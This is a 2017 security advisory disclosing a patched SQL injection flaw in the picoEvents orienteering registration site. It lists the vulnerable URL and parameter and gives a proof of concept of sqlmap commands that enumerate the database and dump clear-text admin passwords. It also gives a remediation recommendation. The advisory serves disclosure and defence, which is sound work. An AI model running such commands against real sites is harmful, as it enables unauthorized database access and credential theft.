Document Title:
===============
entry.picoevents.ch - SQL-Injection Vulnerability

mosi Vulnerability ID (mvid):
===============
6

Discovery Status:
=============
Patched - Public Disclosure

CVSSv2 Overall Score:
===============
9.6

CVSSv2 Vector:
==============
(AV:N/AC:M/Au:N/C:C/I:C/A:C/E:H/RL:U/RC:C/CDP:MH/TD:H/CR:M/IR:M/AR:H)
https://nvd.nist.gov/vuln-metrics/cvss/v2-calculator?vector=(AV:N/AC:M/Au:N/C:C/I:C/A:C/E:H/RL:U/RC:C/CDP:MH/TD:H/CR:M/IR:M/AR:H)

Product & Service Introduction:
==============
picoEvents provides an online registration and live result service to simplify the timekeeping in orienteering combined with SPORTident.
http://picoevents.ch/

Abstract:
==============
Simon Monai found together with Timo Kübler and Namo Flury a SQL-injection vulnerability in the web form. It was abused to delete the competitions stored in the database on the webserver.

Report Timeline:
==============
2017-06-19: Analysis of server attack requested by vendor
2017-06-19: Vulnerability detected
2017-06-19: Vendor informed
2017-06-20: Vendor acknowledge
2017-06-20: Vendor applied workaround
2017-06-21: Patch provided by mosi security research
2017-06-21: Patch faulty
2017-06-26: New patch by mosi security research
2017-06-26: Patch approved by mosi security research
2017-06-27: Public Disclosure

Affected Products:
=============
entry.picoevents.ch - Multisport Registration Page

Exploitation Technique:
=============
SQL Injection

Security Level:
=============
Critical

Technical Details & Description:
=============
Request method (s):
[+] GET

Vulnerable Module(s):
[+] http://www.picoevents.ch/entry/multisport/weiche_msp.php?recordID=95

Proof of Concept (PoC):
=============
By running following commands in the shell of a Kali Linux installation, the administration account passwords can be gathered:

sqlmap -u picoevents.ch/entry/regist/multisport/weiche_msp.php?recordID=95 --dbs
sqlmap -u picoevents.ch/entry/regist/multisport/weiche_msp.php?recordID=95 -D picoEVENTS --tables
sqlmap -u picoevents.ch/entry/regist/multisport/weiche_msp.php?recordID=95 -D picoEVENTS -T admin --columns
sqlmap -u picoevents.ch/entry/regist/multisport/weiche_msp.php?recordID=95 -D picoEVENTS -T admin --dump

The results are alarming. The admin passwords are stored in clear text and allow the hacker to log into the administrator interface and perform changes.

Possible Solution:
============
Check the GET-vars against SQL injection parameters and hash the passwords. A WAF can help preventing further attacks.

Security Risk:
============
This vulnerability is rated critical and was already abused. (CVSSv2 9.6)

Author / Credits:
============
mosi security research - Simon Monai (http://jongliertricks.ch/kontakt)

Public Disclosure:
============
2017-06-27 - https://jongliertricks.ch/mosi-security-research/40

----------------------------
https://jongliertricks.ch/mosi-security-research

• Zurück
• Weiter